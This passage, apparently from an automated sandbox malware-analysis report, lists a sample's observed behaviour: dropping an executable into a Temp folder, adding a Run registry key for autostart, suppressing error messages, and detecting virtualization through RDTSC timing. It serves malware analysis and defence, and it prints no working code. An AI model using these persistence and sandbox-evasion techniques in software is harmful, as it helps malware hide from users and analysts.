ebx; retf 14_2_00C33BEE

#### Persistence and Installation Behavior:

 Drops PE files Show sources
 Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe Jump to dropped file

#### Boot Survival:

 Creates an autostart registry key Show sources
 Source: C:\Windows\SysWOW64\control.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 6LDTLHHPCD Jump to behavior Source: C:\Windows\SysWOW64\control.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 6LDTLHHPCD Jump to behavior

#### Hooking and other Techniques for Hiding and Protection:

 Disables application error messsages (SetErrorMode) Show sources

#### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements Show sources